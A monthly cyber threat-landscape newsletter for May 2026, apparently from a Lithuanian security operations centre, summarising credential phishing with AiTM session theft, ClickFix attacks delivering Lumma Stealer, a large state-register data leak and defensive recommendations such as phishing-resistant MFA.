SOCshare May 2026: News in cyber threat landscape

Icon

SOCshare May 2026: News in cyber threat landscape

May 2026 was clearly dominated by identity and credential theft. Phishing campaigns were, as is most often the case, aimed at Microsoft 365 and other email accounts, while the most advanced ones bypass two-factor authentication (AiTM) in real time. Six out of ten events we logged in May were tied specifically to credential harvesting or session hijacking. That same month, Lithuania was shaken by a large-scale leak from state registers, which likewise appears to have been breached using legitimate login credentials seized by threat actors. This best illustrates the month’s key message: today attackers do not “break down the door”  they log in with someone else’s keys. 

Phishing and AiTM: MFA alone is no longer enough 

Most of May’s events were phishing emails leading to credential-harvesting pages, most often imitating the Microsoft 365 sign-in. Several campaigns used the AiTM (adversary-in-the-middle) technique: once the victim signs in, the attacker proxies the communication in real time and steals the session token, thereby bypassing even enabled MFA. 

We also observed companies’ brands impersonation: we recorded attempts to impersonate an internet service provider in order to deliver fake invoices and defraud victims, as well as imitation of a bank’s login page via a compromised foreign domain, targeting Lithuanian users. Attackers increasingly hide behind legitimate cloud services (e.g., Cloudflare Workers) and redirect chains, which makes such emails harder to filter. The trend is not local: over the past year AiTM attacks have grown by roughly 146% worldwide, and in March Europol took down the major phishing-as-a-service platform Tycoon 2FA. The conclusion is simple – MFA is essential, but it is not enough: phishing-resistant MFA must be deployed, and session token usage anomalies that may indicate token theft must be monitored. 

ClickFix – “Lumma Stealer” 

ClickFix attacks, which dominated in previous months, remained active in May. The victim is shown a fake CAPTCHA or “error” page urging them to “verify” or “fix” access by pasting a command into the Windows Run dialog. This launches a PowerShell command that loads the Lumma Stealer infostealer directly into memory, leaving no files on disk. In May we recorded two such ClickFix Lumma cases. Because the malicious code runs in memory, signature-based defenses struggle to detect it – behavioral analysis is essential. 

Targeted attacks against Lithuanian targets 

Alongside mass phishing, we also saw targeted intrusion attempts. We recorded SSL/VPN login attempts using a list of Lithuanian usernames, which indicates that the attackers had gathered information about a specific organization in advance. We also observed automated scanning of publicly accessible systems and attempts to exploit vulnerabilities (e.g., SSRF), as well as malware distribution through forged installers and CDNs (e.g., a trojanized JDownloader, the DriverHub PUA). Different methods, but the common denominator is the same – initial access through a human or through an unprotected public-facing service. 

What else happened in May 2026?

The Centre of Registers case
The Centre of Registers case
Lithuania disclosed one of its largest recent incidents: more than 600,000 records were illegitimately downloaded from state registers. It has been publicly stated that the attackers used stolen legitimate credentials and ran queries from abroad over several months. President G. Nausėda linked the incident to “hostile states.”
2025 National Cybersecurity Status report
2025 National Cybersecurity Status report
The number of breaches of legal entities’ systems almost doubled (from 155 to 280). For 2026 it is projected that artificial intelligence will make attacks faster and more convincing, while the supply chain will remain one of the main systemic weaknesses.

Key takeaways

Stolen legitimate credentials remain one of the principal intrusion vectors. MFA is essential, yet AiTM bypasses it, so phishing-resistant MFA, monitoring of session-token reuse, and detection of unusual logins are all needed. 

Phishing emails increasingly arrive from legitimate but compromised mailboxes or trusted domains and hide behind cloud services that traditional email filters do not flag. ClickFix and infostealer-type malware run in memory, fileless, so signature-based defenses do not catch them – behavioral and contextual analysis, together with continuous user training, are required. 

Looking ahead 

Organizations should focus on: 

  • deploying phishing-resistant MFA and monitoring session tokens and login anomalies; 
  • limiting and auditing the query volumes of legitimate accounts; 
  • strengthening detection capabilities for ClickFix-type attacks (behavioral analysis) and training employees to recognize brand impersonation. 

Sources 

https://www.nksc.lt/naujienos/nacionaline_kibernetinio_saugumo_bukles_ataskaita_.html 

https://www.elastic.co/security-labs/tycoon-2fa-aitm-detection-engineering 

https://www.microsoft.com/en-us/security/blog/2026/05/04/breaking-the-code-multi-stage-code-of-conduct-phishing-campaign-leads-to-aitm-token-compromise/ 

https://thehackernews.com/2026/05/microsoft-details-phishing-campaign.html 

https://www.microsoft.com/en-us/security/blog/2026/04/30/email-threat-landscape-q1-2026-trends-and-insights/ 

Other news and stories

The 3rd edition of the Guide for developing a National Cybersecurity Strategy
The 3rd edition of the Guide for developing a National Cybersecurity Strategy
SOCshare April 2026 review : Adobe Acrobat Reader, Claude and phishing
SOCshare April 2026 review : Adobe Acrobat Reader, Claude and phishing
SOCcare March 2026: A “Little Gift” from the photo shop
SOCcare March 2026: A “Little Gift” from the photo shop
Safe4SOC updates: enhancing CyberSOC efficiency through unified alert sharing
Safe4SOC updates: enhancing CyberSOC efficiency through unified alert sharing
SOCshare: cybersecurity landscape in February 2026
SOCshare: cybersecurity landscape in February 2026
SOCshare January 2026: cybersecurity landscape review
SOCshare January 2026: cybersecurity landscape review
SOCshare: cybersecurity landscape in December 2025
SOCshare: cybersecurity landscape in December 2025
CTI-AI project: end of year update
CTI-AI project: end of year update